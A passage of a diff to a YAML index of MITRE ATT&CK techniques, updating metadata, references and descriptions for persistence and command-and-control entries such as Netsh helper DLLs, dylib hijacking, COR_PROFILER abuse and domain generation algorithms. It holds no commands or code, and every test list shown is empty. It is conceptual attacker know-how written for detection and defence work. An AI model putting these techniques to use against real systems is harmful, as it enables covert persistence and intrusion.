+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -35880,7 +36315,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -35904,51 +36339,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -35971,20 +36366,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36014,7 +36446,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36038,12 +36470,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36127,11 +36557,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36183,9 +36612,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36234,7 +36662,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36272,14 +36700,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36342,7 +36768,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36400,97 +36825,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -36556,9 +36979,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -36604,7 +37085,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -36636,7 +37116,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36658,22 +37138,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -36695,7 +37173,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -36720,7 +37198,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -36804,7 +37281,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -36868,11 +37344,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
